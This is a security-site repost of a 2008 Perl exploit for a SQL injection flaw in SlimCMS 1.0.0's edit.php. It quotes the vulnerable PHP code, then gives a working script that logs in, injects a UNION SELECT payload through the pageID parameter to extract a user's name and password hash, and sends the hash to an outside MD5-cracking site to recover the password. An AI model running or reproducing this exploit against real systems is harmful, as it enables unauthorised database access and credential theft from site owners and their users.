首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit 来源：staker[at]hotmail[dot]it 作者：athos 发布时间：2008-11-15   #!/usr/bin/perl =starting -------------------------------------------------------- SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit -------------------------------------------------------- by athos - staker[at]hotmail[dot]it download on sourceforge File edit.php 111. if ($password == md5($_POST['password'])) 112. { 113.    if (strlen($_POST['cmsText']) > 2) { 114. $query  = "UPDATE pages SET title = '".$_POST['pageTitle']."', content =  '".       strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID']; 115. mysql_query($query); 116. //$successfulyUpdated 117. responseText = $successfulyUpdated; 118. } 119. 120. if (strlen($_GET['pageID']) > 0) { 121. $query  = "SELECT * FROM pages WHERE ID = ".$_GET['pageID']; 122. $result = mysql_query($query); 123. 124. 125. while($row = mysql_fetch_array($result)) { 126. $pageTitle = $row['title']; 127. $pageContent = $row['content']; 128.  } 129. } NOTE: Works Regardless PHP.ini Settings!     you must be logged..     Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID]     Output: Username: athos           Password: 27e43424d53719a645ae7cca038b45be =cut use strict; use LWP::UserAgent; use LWP::Simple; my $match = q{Editing page "(.+?)"}; my $http = new LWP::UserAgent; my $post = undef; my @login = (); my @out = (); my ($host,$auth,$myid) = @ARGV; unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid) {     print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n";     exit; } $host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#"; @login = split(':',$auth); $post = $http->post($host,[                             username => $login[0],                             password => $login[1],                          ]); if($post->is_success && $post->content =~ $match) {     @out = split(':',$1);        if($#out => 2)     {         my $cracked = search_MD5($out[1]);                 print STDOUT "Username: $out[0]\r\n";         print STDOUT "Password: $out[1] -> $cracked\r\n";         exit;     }    else    {        print STDOUT "Exploit Failed!\r\n";        print STDOUT "Login incorrect or site not vulnerable\\available!\r\n";        exit;    } } sub search_MD5 {     my $hash = shift @_;     my $cont = undef;     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);             if(length($hash) => 32 && !is_error($cont))     {         return $cont;     }     else     {         return exit;     } }       __END__   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Discuz! 6.x/7.x Remote Code Ex ·linux/x86 setuid(0) & execve(/ ·VeryPDF PDFView OCX ActiveX Op ·MemHT Portal 4.0.1 SQL Injecti ·Sudo <= 1.6.9p18 (Defaults set ·Minigal b13 (index.php list) R ·MS Windows Server Service Code ·MS Windows Server Service Code ·Net-SNMP <= 5.1.4/5.2.4/5.4.1 ·Castle Rock Computing SNMPc < ·Opera 9.62 file:// Local Heap ·Linux Kernel < 2.4.36.9/2.6.27   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved